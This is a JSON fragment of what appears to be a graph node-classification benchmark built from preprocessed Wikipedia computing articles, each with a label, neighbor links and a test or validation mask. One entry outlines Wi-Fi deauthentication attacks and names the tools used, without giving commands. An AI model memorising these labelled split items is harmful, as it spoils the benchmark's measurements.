    "text": "Dragon_Buster:dragon buster game featured side-scrolling platform gameplay overworld map similar later super mario bros. series dragon buster also earliest game feature double jump mechanic one first use visual health meter beginning prince named clovis born son kingdom chief bodyguard royal lawrence family young child clovis mischievous undisciplined father thought might best place care monk lived woods far kingdom monk care clovis began learn various aspects knowledge including superior swordsman word reached monk king lawrence 16-year-old daughter celia abducted held fearsome dragon wished break kingdom spirit coerce kingdom bidding clovis felt sense duty chase dragon rescue celia name father order save princess trained daily monk learned withstand injury whether cut swords burned flame still capable fighter ever player must guide hero clovis round castle rescue beloved princess celia multiple princess celias game one every castles goal reach true celia end game final castle celia wears different outfit time rescued player progresses round must choose various paths take castle many paths choose number increases player gets higher rounds paths take player individual levels round multiple bosses level many less powerful enemies scattered throughout level player must find boss contains exit level proceed round finally reach castle clovis vitality restores 25 level completed game ends clovis vitality reaches zero five different types levels cave tower boneyard mountain ruins levels boasts particular type monster others example boneyard boasts lots boss skeleton cave mostly linear type level mostly descends horizontal movement boasts lots bats snakes tower notable many floors player must lot climbing type level boneyard probably hardest type level lot enemies paths choose player likely end defeating every boss level finds boss contains exit mountain player dropping time starts top mountain must work way ruins standard type level bit everything four types levels contain finally castle end round every castle starts long drop takes player dragon room must fight dragon game ported nec pc-8801 computer enix port featured introduction game entirely new ending featuring cinema screens depicting battle-torn clovis teary-eyed celia dragon buster also included hidden mini-game tales abyss playstation 2 nintendo 3ds included various namco museum compilations including namco museum volume 2 original playstation namco museum battle collection playstation portable namco museum virtual arcade xbox 360",
    "neighbors": [
      1060,
      9093,
      2540,
      10316,
      9006,
      10287,
      1776,
      10931
    ],
    "mask": "Test"
  },
  {
    "node_id": 6453,
    "label": 3,
    "text": "Intel_8288:intel 8288 intel 8288 bus controller designed intel 8086/8087/8088/8089 chip supplied 20-pin dip package 8086 8088 operate maximum mode configured primarily multiprocessor operation working coprocessors necessary control signals generated 8288 used ibm pc xt clones ibm pc used successor intel 82288 intel 8288 i8288 industrial grade version available us 14.30 33.75 quantities 100 respectively",
    "neighbors": [
      548,
      9861,
      4203,
      6415,
      6129,
      2874
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6454,
    "label": 4,
    "text": "WDU_(software):wdu software westinghouse disk utility popularly called wdu copy/backup/restore program ibm dos dos/vs dos/vse environments 1978 reported wdu product westinghouse electric corporation use 3,000 sites originally designed ibm dos westinghouse continued developing subsequent generations including dos/vs dos/vse vm/cms product offered wide variety backup copy options data streaming alternating tape drives ability create archives steve o'donnell wrote original utility distributed free charge popularity made westinghouse realize wdu potential commercial product thus laying foundation westinghouse software group eventually called wems westinghouse management systems 1972 ibm released dos/vs ibm/370 westinghouse software group began rewrite new products several new team members assigned including john gaston took lead development following departure steve o'donnell latter 1970s steve o'donnell went found goal systems inc. westinghouse marketing suffered schism time result europe established independent subsidiary westinghouse electric management systems sa wemssa headquartered paris point westinghouse product line wdu westi bifurcated taking independent development paths original development team moved orlando florida eventually came management dr. ray ferguson focused integration vse later conjoining bifurcated products new development began initiated iii orlando florida guided dr. ferguson original plans called vm/cms new vse versions however part way development westinghouse began break division outsourcing thrust reaganomics era badly managed negotiations westinghouse ended neither developers outsourcing partners spelled end one industries foremost software groups north american marketing conducted wems marketing group based pittsburgh included first level tech support westinghouse electric management systems sa wemssa paris london geneva zürich munich amsterdam given world marketing rights initially europe africa far east",
    "neighbors": [
      3969,
      9345,
      4483,
      10756,
      4107,
      10392,
      11673,
      2075,
      2041,
      9771,
      1970,
      11457,
      3529,
      10061,
      467,
      7515,
      7775,
      2283,
      877,
      3320,
      10617,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6455,
    "label": 4,
    "text": "NOYB:noyb noyb – european center digital rights none business non-profit organization based vienna austria established 2017 co-founded austrian lawyer privacy activist max schrems noyb aims launch strategic court cases media initiatives support general data protection regulation proposed eprivacy regulation information privacy general many privacy organisations focus attention governments noyb puts focus privacy issues privacy violations private sector soon general data protection regulation rules went effect 25 may 2018 noyb filed complaints facebook subsidiaries whatsapp instagram well google llc targeting android allegedly violating article 7 4 attempting completely block use services users decline accept data processing consents bundled grant also includes consents deemed unnecessary use service",
    "neighbors": [
      2818,
      3880,
      1930,
      9260,
      9901,
      3599,
      1169,
      3858,
      10002,
      1368
    ],
    "mask": "None"
  },
  {
    "node_id": 6456,
    "label": 5,
    "text": "Peg_DHCP:peg dhcp peg dhcp method defined rfc 2322 assign ip addresses context regular dhcp would n't work server hands wooden clothes-pegs numbered addresses allocate additional leaflet network information client typically user configures device accordingly even though rfc management ip numbers peg-dhcp published first april 1998 describes unlike april fools day rfcs regularly used protocol serious purpose preparation hacking progress 1997 organizers looking robust way assign ip addresses participants obvious first choice dhcp almost completely defenseless rogue servers retained considering traditionally creative use network instead every address allocate variable host part written wooden peg waterproof marker user would attach cable connecting device network peg accompanied leaflet information static net part ip address netmask default gateway dns servers often also mac addresses prevent arp spoofing different subnets lan wlan distinguished different colors used write pegs peg dhcp successfully used hacking progress '97 following events netherlands including 2009 event hacking random german chaos computer club used chaos communication camps still using editions chaos communication congress hacking random pegs distributed according network map event terrain every field distinct subnet per subnet division regular ip address distribution via dhcp fixed ip addresses distributed via peg dhcp obtain ip address via peg dhcp one note subnet number field datenklo dedicated rain-proof box networking equipment usually empty portable toilet subnet number correct routable ip address could handed",
    "neighbors": [
      3592,
      3218,
      11413,
      3742,
      10924,
      6319,
      562,
      2996,
      9524,
      4797,
      4158,
      3006,
      64,
      7364,
      2887,
      5469,
      5470,
      10341,
      10344,
      11112,
      5102,
      8432,
      7411,
      6651,
      6013
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6457,
    "label": 2,
    "text": "Soft_Hard_Real-Time_Kernel:soft hard real-time kernel s.ha.r.k acronym stands soft hard real-time kernel completely configurable kernel architecture designed supporting hard soft non real-time applications interchangeable scheduling algorithms kernel architecture main benefit application developed independently particular system configuration allows new modules added replaced application specific scheduling policies evaluated predictability overhead performance s.ha.r.k developed retis lab research facility sant'anna school advanced studies university pavia tool teaching testing developing real-time software systems used teaching many universities including sant'anna school advanced studies malardalens university sweden unlike kernels traditional operating systems s.ha.r.k fully modular terms scheduling policies aperiodic servers concurrency control protocols modularity achieved partitioning system activities generic kernel set modules registered initialization configure kernel according specific application requirements s.ha.r.k evolution hartik kernel based oslib project",
    "neighbors": [
      7187,
      5363,
      5397,
      9366,
      6207
    ],
    "mask": "Test"
  },
  {
    "node_id": 6458,
    "label": 1,
    "text": "Elasticsearch:elasticsearch elasticsearch search engine based lucene library provides distributed multitenant-capable full-text search engine http web interface schema-free json documents elasticsearch developed java following open-core business model parts software licensed various open-source licenses mostly apache license parts fall proprietary source-available elastic license official clients available java .net c php python apache groovy ruby many languages according db-engines ranking elasticsearch popular enterprise search engine followed apache solr also based lucene shay banon created precursor elasticsearch called compass 2004 thinking third version compass realized would necessary rewrite big parts compass create scalable search solution created solution built ground distributed used common interface json http suitable programming languages java well shay banon released first version elasticsearch february 2010 elastic nv founded 2012 provide commercial services products around elasticsearch related software june 2014 company announced raising 70 million series c funding round 18 months forming company round led new enterprise associates nea additional funders include benchmark capital index ventures round brings total funding 104m march 2015 company elasticsearch changed name elastic june 2018 elastic filed initial public offering estimated valuation 1.5 3 billion dollars 5 october 2018 elastic listed new york stock exchange elasticsearch used search kinds documents provides scalable search near real-time search supports multitenancy elasticsearch distributed means indices divided shards shard zero replicas node hosts one shards acts coordinator delegate operations correct shard rebalancing routing done automatically related data often stored index consists one primary shards zero replica shards index created number primary shards changed elasticsearch developed alongside data collection log-parsing engine called logstash analytics visualisation platform called kibana beats collection lightweight data shippers four products designed use integrated solution referred elastic stack formerly elk stack elasticsearch uses lucene tries make features available json java api supports facetting percolating useful notifying new documents match registered queries another feature called gateway handles long-term persistence index example index recovered gateway event server crash elasticsearch supports real-time get requests makes suitable nosql datastore lacks distributed transactions 20 may 2019 elastic made core security features elastic stack free including tls encrypted communications file native realm creating managing users role-based access control controlling user access cluster apis indexes developed found acquisition elastic 2015 elastic cloud family elasticsearch-powered saas offerings include elasticsearch service well elastic app search service elastic site search service developed elastic ’ acquisition swiftype late 2017 elastic formed partnerships google offer elastic cloud gcp alibaba offer elasticsearch kibana alibaba cloud elasticsearch service elastic cloud official hosted managed elasticsearch kibana offering creators project since august 2018 elasticsearch service users create secure deployments partners google cloud platform gcp alibaba cloud aws offers elasticsearch managed service since 2015 managed services provide hosting deployment backup support managed services also include support kibana elasticsearch basis pangeanic contribution eu marie curie research project expert called activatm pangeanic built bilingual database compatible computer-assisted translation tools could offer real-time access via api variety tools project received funding eu national european central translation memory project connecting europe facility cef programme nec tm aims centralise national translation assets eu member states countries re-use bilingual translation data produced result public procurement contracts",
    "neighbors": [
      1306,
      9245,
      9631,
      5677,
      5295,
      7983,
      6074,
      4797,
      4031,
      8644,
      10565,
      5066,
      5835,
      2765,
      6359,
      8408,
      9179,
      9828,
      8554,
      5612,
      9455,
      113,
      3573,
      1142,
      7288
    ],
    "mask": "Test"
  },
  {
    "node_id": 6459,
    "label": 2,
    "text": "NewDos/80:newdos/80 newdos/80 third-party operating system radio shack trs-80 line microcomputers released 1980 newdos/80 developed apparat inc. denver colorado operating system additional commands features available trsdos native operating system trs-80 computers newdos/80 allowed trs-80 computers take advantage advances floppy disk storage went beyond initial 87.5kb 35-track single-density single-sided format system also corrected issues early versions trsdos arbitrarily losing data due errors communicated contemporary trs-80 disk drives 1771 disk controller newdos/80 many options specifying specific low-level disk configurations settings diskette formats disk drive types track geometry controllers could configured using pdrive command version 2.1 apparat added support hard disk drives via external bus adapter newdos/80 written cliff ive jason matthews ive primary author newdos incarnations matthews wrote patches various applications scripsit visicalc ive later retired matthews went projects software business typical newdos/80 commands criticizing newdos nearly incomprehensible documentation jerry pournelle wrote 1980 much better operating system needlessly complex trsdos stated tandy ought marketing newdos+",
    "neighbors": [
      2179,
      10499,
      10883,
      394,
      3978,
      1804,
      6797,
      273,
      7057,
      6675,
      7187,
      5397,
      2198,
      9366,
      6296,
      25,
      8729,
      10776,
      8092,
      4637,
      7325,
      9887,
      10016,
      9762,
      421,
      5158,
      10235,
      2345,
      7983,
      3248,
      7217,
      11184,
      6837,
      823,
      9784,
      4409,
      10809,
      6075,
      7483,
      6078,
      2811,
      576,
      9151,
      11075,
      8388,
      10564,
      4423,
      8136,
      11539,
      9932,
      11667,
      5840,
      5457,
      11601,
      1750,
      7382,
      8410,
      10333,
      10590,
      97,
      1253,
      8551,
      6120,
      8298,
      5359,
      6128,
      8306,
      5363,
      5492,
      5619,
      7285,
      9335,
      2168,
      1147,
      3197,
      1150
    ],
    "mask": "None"
  },
  {
    "node_id": 6460,
    "label": 9,
    "text": "Xavier_Leroy:xavier leroy xavier leroy born march 15 1968 french computer scientist programmer best known role primary developer ocaml system professor software science collège de france appointment collège de france 2018 senior scientist directeur de recherche french government research institution inria leroy admitted école normale supérieure paris 1987 studied mathematics computer science 1989 1992 phd computer science supervision gérard huet internationally recognized expert functional programming languages compilers recent years taken interest formal methods formal proofs certified compilation leader compcert project develops optimizing compiler c programming language formally verified coq leroy also original author linuxthreads widely used threading package linux versions prior 2.6 linux 2.6 introduced nptl much extensive support kernel replace linuxthreads 2015 named fellow association computing machinery contributions safe high-performance functional programming languages compilers compiler verification awarded 2016 milner award royal society",
    "neighbors": [
      1952,
      6306,
      9294,
      1783,
      8057,
      8924,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6461,
    "label": 1,
    "text": "Croatian_Register_of_Shipping:croatian register shipping croatian register shipping also known crs independent classification society established 1949 non-profit organisation working marine market developing technical rules supervising implementation managing risk performing surveys ships society head office split croatian register shipping member international association classification societies iacs since may 2011 register officially recognized malta maritime authority",
    "neighbors": [
      5099
    ],
    "mask": "Test"
  },
  {
    "node_id": 6462,
    "label": 2,
    "text": "Windows_Vista_editions:windows vista editions windows vista—a major release microsoft windows operating system—was available six different product editions starter home basic home premium business enterprise ultimate september 5 2006 microsoft announced usd pricing editions available retail channels operating system later made available retail january 30 2007 microsoft also made windows vista available purchase download windows marketplace first version windows distributed digital distribution platform editions sold retail available full upgrade versions later included service pack 1 sp1 microsoft characterized retail packaging windows vista designed user-friendly … small hard plastic container designed protect software inside life-long use packaging opens sideways reveal windows vista dvd suspended clear plastic case windows vista disc uses holographic design similar discs microsoft produced since windows 98 exception windows vista starter editions support 32-bit x86 64-bit x64 processor architectures microsoft ceased retail copies windows vista october 2010 oem distribution windows vista ended 2011 notes support 64-bit platforms intel xeon intel core 2 amd opteron amd athlon 64 microsoft released 64-bit versions every edition windows vista except starter edition editions run 32-bit programs running within wow64 subsystem 32-bit programs run natively though applications rely device drivers run unless device drivers written 64-bit windows reviewers reported 64-bit editions windows vista outperform 32-bit counterparts synthetic benchmarks passmark 32-bit editions windows vista excluding starter edition support 4 gb ram 64-bit edition home basic supports 8 gb ram home premium supports 16 gb business enterprise ultimate editions support 128 gb ram 64-bit versions microsoft operating systems currently impose 16 tb limit address space processes created 64-bit editions windows vista 8 tb virtual memory user processes 8 tb kernel processes create virtual memory 16 tb march 2004 european commission fined microsoft €497 million us 603 million ordered company provide version windows without windows media player commission concluded microsoft broke european union competition law leveraging near monopoly market pc operating systems onto markets work group server operating systems media players microsoft reached agreement commission would release court-compliant version windows xp edition n include company windows media player instead encourages users download install preferred media player similarly december 2005 korean fair trade commission ordered microsoft make available editions windows xp windows server 2003 contain windows media player windows messenger similar european commission decision based grounds microsoft abused dominant position market push products onto consumers unlike decision however microsoft also forced withdraw non-compliant versions windows south korean market decision resulted microsoft releasing k kn variants home professional editions windows xp august 2006 continuance requirements microsoft released n kn variants editions windows vista exclude windows media player well k kn editions include links third-party media player instant messaging software n editions windows vista require third-party software separate installation windows media player play audio cds media formats mpeg-4 two additional editions windows vista released use developers embedded devices microsoft lists system requirements editions desktop variants editions licensed exclusively development embedded devices notes unlike previous versions windows windows vista support compliance checking installation compliance checking previously allowed users insert disc evidence operating system upgraded previous version would allow users enter upgrade license perform clean install result upgrade versions windows vista install unless previous version windows already installed machine upgraded workaround limitation reported paul thurrott stated users able perform full installation windows vista upgrade media bypassing prompt enter license setup installed reinstall operating system previous installation—this essentially allows users purchased upgrade version perform full retail installation workaround indeed possible microsoft cautioned users perform full installation operating system method without genuine license previous version would violation windows vista end-user license agreement users upgrade windows xp windows vista upgrade one edition windows vista another however upgrading 32-bit edition 64-bit edition downgrading 64-bit edition 32-bit edition requires clean install addition potential upgrade combinations supported following chart indicates possible upgrade paths notes",
    "neighbors": [
      6150,
      11270,
      5643,
      11283,
      540,
      11301,
      1577,
      6697,
      1581,
      1077,
      582,
      1098,
      8798,
      10338,
      8296,
      617,
      5225,
      8299,
      7796,
      6265,
      8315,
      4731,
      636,
      10879,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      10900,
      2221,
      3250,
      5300,
      9910,
      8391,
      10957,
      3283,
      3289,
      4316,
      740,
      9448,
      5356,
      10989,
      5380,
      8976,
      3857,
      9505,
      6441,
      7983,
      3890,
      6972,
      321,
      11605,
      2391,
      4439,
      11103,
      2919,
      1400,
      8576,
      3463,
      5004,
      398,
      8080,
      4505,
      929,
      4515,
      8103,
      3496,
      1978,
      7615,
      8640,
      7106,
      6088,
      9173,
      5600,
      6114,
      488,
      4074,
      2027,
      5103,
      499,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 6463,
    "label": 3,
    "text": "Stepping_level:stepping level integrated circuits stepping level revision level version number refers introduction revision one photolithographic photomasks within set photomasks used pattern integrated circuit term originated name equipment steppers exposes photoresist light integrated circuits two primary classes mask sets 1. base layers used build structures make logic transistors 2 metal layers connect logic together typically integrated circuit manufacturer intel amd invests money stepping i.e revision masks found bugs logic made improvements design allow faster processing found way increase yield improve bin splits i.e. create faster transistors hence faster cpus improve maneuverability easily identify marginal circuits reduce test time reduce cost testing part many integrated circuits means interrogating order discover stepping level example x86 cpus executing cpuid eax register set 1 place values registers show cpu stepping level stepping identifiers commonly alphabetic letter followed numeric number example b2 usually letter indicates revision level chip base layers number indicates revision level metal layers change letter indicates change base layer mask revision metal layers change number indicates metal-layer–only mask revision analogy major/minor revision numbers used software versioning base layer revision changes time consuming expensive manufacturer fixes difficult impossible accomplish metal-only changes integrated circuit intel core microarchitecture uses number steppings unlike previous microarchitectures represent incremental improvements also different sets features like cache size low power modes steppings used across brands typically disabling features limiting clock frequencies low-end chips steppings reduced cache size use separate naming scheme means releases longer alphabetic order",
    "neighbors": [
      4217,
      6924,
      1005,
      8301,
      8590,
      5073,
      499,
      4886,
      3352,
      2201,
      2237,
      11550
    ],
    "mask": "Test"
  },
  {
    "node_id": 6464,
    "label": 3,
    "text": "UltraSPARC_IV:ultrasparc iv ultrasparc iv jaguar follow-up ultrasparc iv+ panther microprocessors designed sun microsystems manufactured texas instruments fourth generation ultrasparc microprocessors implement 64-bit sparc v9 instruction set architecture isa ultrasparc iv originally succeeded ultrasparc v millennium canceled announcement niagara ultrasparc t1 microprocessor early 2004 instead succeeded fujitsu-designed sparc64 vi ultrasparc iv developed part sun throughput computing initiative included ultrasparc v millennium gemini ultrasparc t1 niagara microprocessors four original designs initiative two reached production ultrasparc iv ultrasparc t1 whereas millennium niagara implemented block multithreading also known coarse-grained multithreading ultrasparc iv implemented chip-multithreading cmp — multiple single-thread cores ultrasparc iv first multi-core sparc processor released march 2004 internally implements two modified ultrasparc iii cores physical packaging identical ultrasparc iii exception one pin ultrasparc iii cores improved variety ways instruction fetch store bandwidth data prefetching optimized floating-point adder implements additional hardware handle number nan underflow cases avoid exceptions cores share l2 cache capacity 16 mb l2 cache tags ultrasparc iv contains 66 million transistors measures 22.1 mm 16.1 mm 356 mm fabricated texas instruments 0.13 µm process ultrasparc iv+ released mid-2005 also dual-core design featuring enhanced processor cores on-chip l2 cache fabricated 90 nanometer manufacturing process initial speed ultrasparc iv+ 1.5 ghz 0.3 ghz less intended 1.8 ghz april 2007 increased 2.1 ghz contains 295 million transistors servers using ultrasparc iv released september 2004 ultrasparc iv+ released sun servers september 2005 sun fire v490 v890 e2900 e4900 e6900 e20k e25k systems use ultrasparc iv iv+ processors systems range 4 72 processor sockets 8 144 cores servers powered ultrasparc iv+ processor well received allowing sun regain revenue lead risc/unix server market 2006",
    "neighbors": [
      9090,
      9731,
      1801,
      1675,
      4235,
      1809,
      4241,
      7702,
      1818,
      8863,
      9637,
      1707,
      2731,
      10926,
      3247,
      9391,
      6322,
      10675,
      4664,
      4285,
      7104,
      9665,
      8266,
      2895,
      3919,
      597,
      9302,
      731,
      2269,
      9955,
      7270,
      11626,
      5358,
      1776,
      5492,
      11636,
      1399,
      1788
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6465,
    "label": 1,
    "text": "ADOdb_Lite:adodb lite adodb lite small fast adodb-compatible database abstraction library written php uses less 100 kb system ram http access compared 640 kb adodb benchmark adodb lite also 300 faster adodb library adodb lite library fully expandable use modules library contains pear module contains pear db-compatible commands library also contains transaction module giving full transaction support many supported databases library support number user created modules easily expand library module system also gives programmer/admin ability structure library usage based upon needs website library fast compared database abstraction libraries",
    "neighbors": [
      8644,
      9481,
      5546,
      4106,
      8781,
      7022,
      8539,
      190
    ],
    "mask": "Test"
  },
  {
    "node_id": 6466,
    "label": 4,
    "text": "Wi-Fi_deauthentication_attack:wi-fi deauthentication attack wi-fi deauthentication attack type denial-of-service attack targets communication user wi-fi wireless access point unlike radio jammers deauthentication acts unique way ieee 802.11 wi-fi protocol contains provision deauthentication frame sending frame access point station called sanctioned technique inform rogue station disconnected network attacker send deauthentication frame time wireless access point spoofed address victim protocol require encryption frame even session established wired equivalent privacy wep data privacy attacker needs know victim mac address available clear wireless network sniffing one main purposes deauthentication used hacking community force clients connect evil twin access point used capture network packets transferred client rap attacker conducts deauthentication attack target client disconnecting current network thus allowing client automatically connect evil twin access point order mount brute-force dictionary based wpa password cracking attack wifi user wpa wpa2 enabled hacker must first sniff wpa 4-way handshake user elicited provide sequence first forcing offline deauthentication attack similar phishing style attack without password cracking wifiphisher starts deauthentication attack disconnect user legitimate base station mounts man-in-the-middle attack collect passwords supplied unwitting user federal communications commission fined hotels companies launching deauthentication attacks guests purpose drive personal hotspots force pay on-site wi-fi services aircrack-ng suite mdk3 void11 scapy zulu software mount wifi deauthentication attack aireplay-ng aircrack-ng suite tool run deauthentication attack executing one-line command pineapple rogue access point issue deauth attack wifijammer also automatically scan jam networks within range esp8266 used perform detect deauth attacks using wi-pwn android nexmon supports broadcom wlan chip deauth attacks",
    "neighbors": [
      4163,
      4580,
      4517,
      7556,
      7557,
      2409,
      1070,
      9968,
      10329,
      10332,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6467,
    "label": 3,
    "text": "Solitaire_Royale:solitaire royale solitaire royale collection solitaire games published spectrum holobyte 1987 apple iigs ms-dos macintosh amiga eight games included 3 shuffles draw pyramid golf corners reno klondike canfield calculation also three children games pairs wish concentration solitaire royale computer solitaire card-game simulation game features colorful card-back designs digitized sounds cards shuffling eight solitaire games included game features tournament competition challenge accumulate highest total score upon playing eight games row two combatants receiving exactly deal solitaire game fireworks displayed game received 5 5 stars dragon 141 role computers column",
    "neighbors": [
      9166
    ],
    "mask": "Test"
  },
  {
    "node_id": 6468,
    "label": 2,
    "text": "Individual_Computers_Catweasel:individual computers catweasel catweasel family enhanced floppy disk controllers german company individual computers controllers designed allow recent computers pcs access wide variety older non-native disk formats using standard floppy drives floppy controller chip used ibm pcs compatibles nec 765a technology progressed descendants machines used essentially extensions chip many computers particularly ones commodore early ones apple write disks formats encoded decoded 765a even though drive mechanisms less identical ones used pcs catweasel therefore created emulate hardware necessary produce low-level formats catweasel provides custom floppy drive interface addition floppy interfaces computer already equipped industry standard floppy drives attached catweasel allowing host computer read many standard custom formats means custom software drivers supported formats initial version catweasel introduced 1996 since undergone several revisions catweasel mk1 mk2 commodore amiga 1200 amiga 4000 sold october 2001 mk3 added pci compatibility sold mid-2004 succeeded mk4 mk2 re-released 2006 special anniversary edition original version catweasel introduced 1996 amiga computer available two versions one commodore amiga 1200 one amiga 4000 amiga 1200 version connected machine clock port amiga 4000 version connected machine ide port pass-through provided amiga 4000 version ide port could still used mass storage devices version catweasel controller developed use standard pc isa slot means reading custom non-pc floppy formats ms-dos custom dos commands required use interface official software drivers also available windows mk2 catweasel redesign original catweasel merging amiga 1200 amiga 4000 versions single product could used computers providing new pcb layout allowed easily installed standard amiga 1200 case continued popularity catweasel mk2 led special anniversary edition model released 2006 pcb anniversary edition received minor updates however retained form factor functionality mk2 catweasel z-ii version amiga zorro-ii expansion combined catweasel mk2 controller another individual computers product buddha single board providing floppy ide interfaces host computer catweasel mk3 designed interface either pci slot amiga zorro ii slot clock port amiga 1200 addition low-level access granted floppy drives socket commodore 64 sid sound chip port amiga 2000 keyboard two 9-pin digital joysticks atari 2600 de facto standard mk3 succeeded mk4 catweasel mk4 officially announced 18 july 2004 wide array new features planned however due manufacturing delays production backlogs mk4 released early february 2005 version catweasel makes heavy use reconfigurable logic form altera acex ep1k30tc144-3n fpga chip well amd mach110 pld pci interface ic mk4/mk4+ driver uploads fpga microcode start makes easy updates possible without replace hardware official software drivers available windows unofficial drivers utilities available linux catweasel mk4plus appears longer available",
    "neighbors": [
      8355,
      9477,
      5736,
      6797,
      3886,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 6469,
    "label": 8,
    "text": "Mobile_deep_linking:mobile deep linking context mobile apps deep linking consists using uniform resource identifier uri links specific location within mobile app rather simply launching app deferred deep linking allows users deep link content even app already installed depending mobile device platform uri required trigger app may different see list supported deep links unlike web underlying technology http urls allow deep linking default enabling deep linking mobile apps requires apps configured properly handle uniform resource identifier uri like url address website uri address app mobile device examples uris launch mobile app format uri used trigger deep link app often different depending mobile operating system android devices work intents blackberry 10 devices work bb10 invocation framework firefox os devices work web activities ios devices work openurl application method windows phone 8 devices work urimapper class greatest benefit mobile deep linking ability marketers app developers bring users directly specific location within app dedicated link deep links made web usable mobile deep links mobile apps unlike deep links web link format standardized based http guidelines mobile deep links follow consistent format causes confusion development different sets links required access app different mobile operating system google allows app developers ios android apps surface in-app content via mobile google searches developers need submit app deep linking apps ios android indexed google alternatively developers use google short links deep link mobile app users app installed direct others webpage one example better user experience made possible deep link data passing install solution one search information passed app bring user exact information drove app compared common web link implementation may reduce number steps required example search hotels boston user currently needs shortened",
    "neighbors": [
      1944,
      6672,
      2259,
      6836
    ],
    "mask": "Test"
  },
  {
    "node_id": 6470,
    "label": 1,
    "text": "NitrosBase:nitrosbase nitrosbase russian high-performance multi-model database system database system supports relational graph document database models developer initially implemented database triplestore semantic web pioneer russia remodelling multi-model database supported skolkovo innovation center 2017 database used information systems support health-care reform modern russia nitrosbase data stored format internal graph model data models views representations similar sql views regardless model format data imported possible query using query language thereby uniformly addressing data imported different models moreover possible query data model using query language native model nitrosbase supports following languages internal graph model close rdf* used amazon neptune allows treat internal data graph rdf graph property graph performing queries sparql gremlin-style languages instead indexes based b+-trees traditionally used graph databases nitrosbase uses sparse link index devising another source performance gain storage optimization physical level order reduce number random access operations like memsql nitrosbase translates query c++ code nitrosbase-derived product ms sql server accelerator awarded first prize silicon valley open doors www.svod.org conference 2009 named startup day microsoft bizspark program",
    "neighbors": [
      5632,
      9634,
      3171,
      8451,
      6629,
      7462,
      9828,
      5640,
      10413,
      7983,
      10452,
      9397,
      823,
      2456,
      11098,
      9631
    ],
    "mask": "None"
  },
  {
    "node_id": 6471,
    "label": 4,
    "text": "IP_access_controller:ip access controller ip access controller electronic security device designed identify users control entry exit protected areas typical ip access controller supports 2 4 basic access control readers may internal web server support configuration via browser via software installed host pc main features distinguish ip controllers older generation serial controllers 1 ip controllers connect directly lan/wan inputs outputs necessary controlling readers monitoring door inputs controlling locks 2 ip controllers on-board network interface require use terminal server examples ip access controllers gc01n simac/simacquadcore pac-512-ip pac/stanley security products directdoor ge security products vertx v2000 hid global advantages disadvantages considering fact solus developed controller options allow users choose ip serial",
    "neighbors": [
      5472,
      2737,
      3044
    ],
    "mask": "None"
  },
  {
    "node_id": 6472,
    "label": 4,
    "text": "Software_forensics:software forensics software forensics science analyzing software source code binary code determine whether intellectual property infringement theft occurred centerpiece lawsuits trials settlements companies dispute issues involving software patents copyrights trade secrets software forensics tools compare code determine correlation measure used guide software forensics expert past methods code comparison included hashing statistical analysis text matching tokenization methods compared software code produced single measure indicating whether copying occurred however measures accurate enough admissible court results accurate algorithms could easily fooled simple substitutions code methods take account fact code could similar reasons copying 2003 robert zeidman developed algorithms incorporated codesuite tool multidimensional software correlation divides software code basic elements determines elements similar “ correlated. ” also created procedure filtering interpreting correlations eliminate reasons correlation due copying common algorithms third-party code common identifier names common author automatic code generation combination algorithms procedures resulted reliable quantitative analysis available previously zeidman ’ book software ip detective handbook considered standard textbook software forensics codesuite tools methodology used many software ip litigations including connectu v. facebook symantec v. irs baker mckenzie sco group inc. v. international business machines corp following use software tools compare code determine amount correlation expert use iterative filtering process determine correlated code due third-party code code generation tools commonly used names common algorithms common programmers copying correlation due copying copier authority rights holder copyright infringement occurred software contain trade secrets provide competitive advantage business determine trade secret theft tools processes used detect copyright infringement code copied without authority code characteristics trade secret—it generally known business keeps secret secrecy maintains value business—then copied code constitutes trade secret theft trade secret theft also involve taking code functionality without literally copying code comparing code functionality difficult problem yet accomplished algorithm reasonable time reason finding theft code functionality still mostly manual process trade secret functionality currently possible scientifically detect software patent infringement software patents cover general implementation rather specific source code example program implements patented invention written many available programming languages using different function names variable names performing operations different sequences many combinations ways implement inventions software even powerful modern computers consider combinations code might infringe patent work still left human experts using knowledge experience problem many software forensics trying automate finding algorithm simplifying process one important rule forensic analysis objective facts must considered first reviewing comments code searching internet find information companies distribute code programmers wrote code useful objective facts regarding correlation considered analysis performed using forensic tools procedures analysts begin looking subjective evidence like comments code information subjective evidence conflicts objective analysis analysts need doubt subjective evidence fake copyright notices open source notifications programmer names added source code copying took place order disguise copying uncommon real-world cases code theft",
    "neighbors": [
      5635,
      5284
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6473,
    "label": 4,
    "text": "Malcon:malcon malcon premier international technology security conference focusing exclusively proactive malware research analysis malcon part information sharing analysis center support government india executed india uk based multinational media company ubm plc also owns infamous black hat briefings malcon aims bringing together malware information security researchers across globe share key research insights building containment next generation malwares unlike hacker conventions malcon opposed much debated ‘ zero day ’ ‘ full disclosure ’ first malcon conference took place december 2010 mumbai pune india many attendees malcon include security professionals government employees lawyers researchers journalists hackers interest malwares global impact economy event promotes “ proactive ” research malware coding openly invites malcoders come forward demonstrate creation malcon founded 2010 rajshekhar murthy known thebluegenius science graduate ex-employee microsoft corporation since inception malcon widely backed numerous government organizations ntro eventually malcon became part information sharing analysis center isac non-profit support government india 2011 event organizers issued faq outlines philosophy malcon explain objective “ aim help security industry well software industry understand fine ‘ art ’ malware development covers even exploits build better secure code well work towards mitigating potential new attack vectors. ” interview kerbsonsecurity quoted conference done inviting best well known security experts share statistics slides ‘ analysis ’ malwares benefit community today except awareness need malcon conference bridge ignored gap security companies malcoders get common platform talk like concept ‘ ethical hacking ’ helped organizations see hackers bad time accept ‘ ethical malcoding ’ required research identify mitigate newer malwares ‘ proactive ’ way rajshekhar murthy coined new security term “ ethical malcoding ” differentiate malcoders work background independently various security firms research financial gain another term guuware describe software ’ may similar attributes malware used defensive purposes malcon approach openly inviting ethical malcoders gained lot international attention faced criticism notable security sites bloggers part malcon faq maintains “ rapid analysis detection technology malcon conference new malwares constantly created even available handful security vendors team researchers analysis enough active open participation ‘ ethical malcoders ’ help advance research containment capability existing methods ” malcon convention following format malware comic announced malcon team day maha shivaratri 20 february 2012 stated planned release zero-days using comics comic expected two formats web printed version printed version specifically indian government officials intelligence agencies law enforcement groups regular attendees conference creation malware journal 